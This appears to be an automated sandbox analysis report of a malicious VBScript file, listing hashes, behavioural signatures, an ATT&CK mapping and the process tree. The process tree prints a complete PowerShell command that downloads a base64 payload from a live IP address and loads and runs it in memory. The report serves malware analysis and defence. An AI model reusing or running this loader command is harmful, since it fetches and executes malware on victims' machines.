Analysis

  • max time kernel
    37s
  • max time network
    45s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    03-10-2022 10:22

General

  • Target

    PD3007800123.vbs

  • Size

    219KB

  • MD5

    d873de1b3b907887305e325426c407d5

  • SHA1

    99c502d13b119a1b614f7384a3ba83fab10cd85d

  • SHA256

    eedb863078dbdbd83a0d52d86dd779f27115360e17676e539602f4e1a8c9437c

  • SHA512

    c4577d024fbbd2ea7b143d9780c7ca9f813f914c7d820151acfcc5ba7a92ebea832537a9847b5a7d203df6f00186be6d9bc5a26e515c705badeee985def3ffa1

  • SSDEEP

    48:DVK0hbQvuivLvyvTxYvsvuiv7vu2vJR2vFvvvfv1KvFvDv2UfHvrvUvgYvc2vGgR:xKWdUIlVcWHfvGvXimF

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://20.7.14.99/dll/dll_ink.pdf

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PD3007800123.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1708
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://20.7.14.99/dll/dll_ink.pdf'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('txt.emit/swen/36.81.331.591//:ptth'))
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1720

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1708-54-0x000007FEFBD81000-0x000007FEFBD83000-memory.dmp
    Filesize

    8KB

  • memory/1720-55-0x0000000000000000-mapping.dmp
  • memory/1720-57-0x000007FEF4240000-0x000007FEF4C63000-memory.dmp
    Filesize

    10.1MB

  • memory/1720-59-0x0000000002844000-0x0000000002847000-memory.dmp
    Filesize

    12KB

  • memory/1720-58-0x000007FEF36E0000-0x000007FEF423D000-memory.dmp
    Filesize

    11.4MB

  • memory/1720-60-0x000000000284B000-0x000000000286A000-memory.dmp
    Filesize

    124KB

  • memory/1720-61-0x0000000002844000-0x0000000002847000-memory.dmp
    Filesize

    12KB

  • memory/1720-62-0x000000000284B000-0x000000000286A000-memory.dmp
    Filesize

    124KB